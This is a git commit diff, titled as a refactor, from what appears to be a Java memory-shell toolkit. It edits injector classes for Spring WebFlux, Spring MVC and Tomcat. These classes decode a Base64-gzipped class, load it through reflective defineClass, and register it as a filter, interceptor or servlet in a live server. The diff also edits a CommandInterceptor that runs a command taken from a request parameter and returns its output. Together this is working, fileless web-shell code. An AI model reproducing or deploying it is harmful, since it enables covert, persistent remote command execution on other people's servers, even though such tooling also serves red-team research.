refactor: simplify code

This commit is contained in:
ReaJason
2025-11-20 00:36:25 +08:00
parent 2620a30a4e
commit aa5683a8d8
5 changed files with 13 additions and 40 deletions
@@ -32,7 +32,7 @@ public class SpringWebFluxWebFilterInjector {
public SpringWebFluxWebFilterInjector() { public SpringWebFluxWebFilterInjector() {
try { try {
FilteringWebHandler webHandler = getWebHandler(); FilteringWebHandler webHandler = getWebHandler();
Object filter = getShell(); Object filter = getShell(webHandler);
inject(webHandler, filter); inject(webHandler, filter);
} catch (Exception e) { } catch (Exception e) {
e.printStackTrace(); e.printStackTrace();
@@ -52,19 +52,18 @@ public class SpringWebFluxWebFilterInjector {
return null; return null;
} }
private Object getShell() throws Exception { @SuppressWarnings("all")
ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); private Object getShell(Object context) throws Exception {
Object interceptor = null; ClassLoader classLoader = context.getClass().getClassLoader();
try { try {
interceptor = classLoader.loadClass(getClassName()).newInstance(); return classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e) { } catch (Exception e) {
byte[] clazzByte = gzipDecompress(Base64Utils.decodeFromString(getBase64String())); byte[] clazzByte = gzipDecompress(Base64Utils.decodeFromString(getBase64String()));
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClass.setAccessible(true); defineClass.setAccessible(true);
Class<?> clazz = (Class<?>) defineClass.invoke(classLoader, clazzByte, 0, clazzByte.length); Class<?> clazz = (Class<?>) defineClass.invoke(classLoader, clazzByte, 0, clazzByte.length);
interceptor = clazz.newInstance(); return clazz.newInstance();
} }
return interceptor;
} }
public void inject(FilteringWebHandler webHandler, Object filter) throws Exception { public void inject(FilteringWebHandler webHandler, Object filter) throws Exception {
@@ -34,24 +34,14 @@ public class SpringWebMvcInterceptorInjector {
} }
} }
public Class<?> getServletContextClass(ClassLoader classLoader) throws ClassNotFoundException { @SuppressWarnings("all")
try {
return classLoader.loadClass("javax.servlet.ServletContext");
} catch (Throwable e) {
return classLoader.loadClass("jakarta.servlet.ServletContext");
}
}
@SuppressWarnings("unchecked")
public Object getContext() throws ClassNotFoundException, InvocationTargetException, NoSuchMethodException, IllegalAccessException { public Object getContext() throws ClassNotFoundException, InvocationTargetException, NoSuchMethodException, IllegalAccessException {
ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
Object context = null; Object context = null;
try { try {
Object requestAttributes = invokeMethod(classLoader.loadClass("org.springframework.web.context.request.RequestContextHolder"), "getRequestAttributes"); Object requestAttributes = invokeMethod(classLoader.loadClass("org.springframework.web.context.request.RequestContextHolder"), "getRequestAttributes");
Object request = invokeMethod(requestAttributes, "getRequest"); Object request = invokeMethod(requestAttributes, "getRequest");
Object session = invokeMethod(request, "getSession"); context = invokeMethod(request, "getAttribute", new Class[]{String.class}, new Object[]{"org.springframework.web.servlet.DispatcherServlet.CONTEXT"});
Object servletContext = invokeMethod(session, "getServletContext");
context = invokeMethod(classLoader.loadClass("org.springframework.web.context.support.WebApplicationContextUtils"), "getWebApplicationContext", new Class[]{getServletContextClass(classLoader)}, new Object[]{servletContext});
} catch (Exception e) { } catch (Exception e) {
e.printStackTrace(); e.printStackTrace();
} }
@@ -69,6 +59,7 @@ public class SpringWebMvcInterceptorInjector {
return context; return context;
} }
@SuppressWarnings("all")
private Object getShell() throws Exception { private Object getShell() throws Exception {
ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
Object interceptor = null; Object interceptor = null;
@@ -84,7 +84,7 @@ public class TomcatServletInjector {
@SuppressWarnings("all") @SuppressWarnings("all")
public void inject(Object context, Object servlet) throws Exception { public void inject(Object context, Object servlet) throws Exception {
if (isInjected(context)) { if (invokeMethod(context, "findServletMapping", new Class[]{String.class}, new Object[]{getUrlPattern()}) != null) {
System.out.println("servlet already injected"); System.out.println("servlet already injected");
return; return;
} }
@@ -107,18 +107,6 @@ public class TomcatServletInjector {
System.out.println("servlet inject success"); System.out.println("servlet inject success");
} }
@SuppressWarnings("all")
public boolean isInjected(Object context) throws Exception {
Map<String, String> servletMappings = (Map<String, String>) getFieldValue(context, "servletMappings");
Collection<String> values = servletMappings.values();
for (String name : values) {
if (name.equals(getClassName())) {
return true;
}
}
return false;
}
private void support56Inject(Object context, Object wrapper) throws Exception { private void support56Inject(Object context, Object wrapper) throws Exception {
ClassLoader contextClassLoader = context.getClass().getClassLoader(); ClassLoader contextClassLoader = context.getClass().getClassLoader();
Class<?> serverInfo = contextClassLoader.loadClass("org.apache.catalina.util.ServerInfo"); Class<?> serverInfo = contextClassLoader.loadClass("org.apache.catalina.util.ServerInfo");
@@ -3,10 +3,10 @@ package com.reajason.javaweb.memshell.shelltool.command;
import org.springframework.web.servlet.AsyncHandlerInterceptor; import org.springframework.web.servlet.AsyncHandlerInterceptor;
import org.springframework.web.servlet.ModelAndView; import org.springframework.web.servlet.ModelAndView;
import javax.servlet.ServletOutputStream;
import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpServletResponse;
import java.io.InputStream; import java.io.InputStream;
import java.util.Scanner;
/** /**
* @author ReaJason * @author ReaJason
@@ -21,12 +21,7 @@ public class CommandInterceptor implements AsyncHandlerInterceptor {
String param = getParam(request.getParameter(paramName)); String param = getParam(request.getParameter(paramName));
if (param != null) { if (param != null) {
InputStream inputStream = getInputStream(param); InputStream inputStream = getInputStream(param);
ServletOutputStream outputStream = response.getOutputStream(); response.getWriter().write(new Scanner(inputStream).useDelimiter("\\A").next());
byte[] buf = new byte[8192];
int length;
while ((length = inputStream.read(buf)) != -1) {
outputStream.write(buf, 0, length);
}
return false; return false;
} }
} catch (Throwable e) { } catch (Throwable e) {
@@ -16,7 +16,7 @@ import java.nio.charset.StandardCharsets;
* @author ReaJason * @author ReaJason
* @since 2024/12/25 * @since 2024/12/25
*/ */
public class CommandWebFilter extends ClassLoader implements WebFilter { public class CommandWebFilter implements WebFilter {
public static String paramName; public static String paramName;
@Override @Override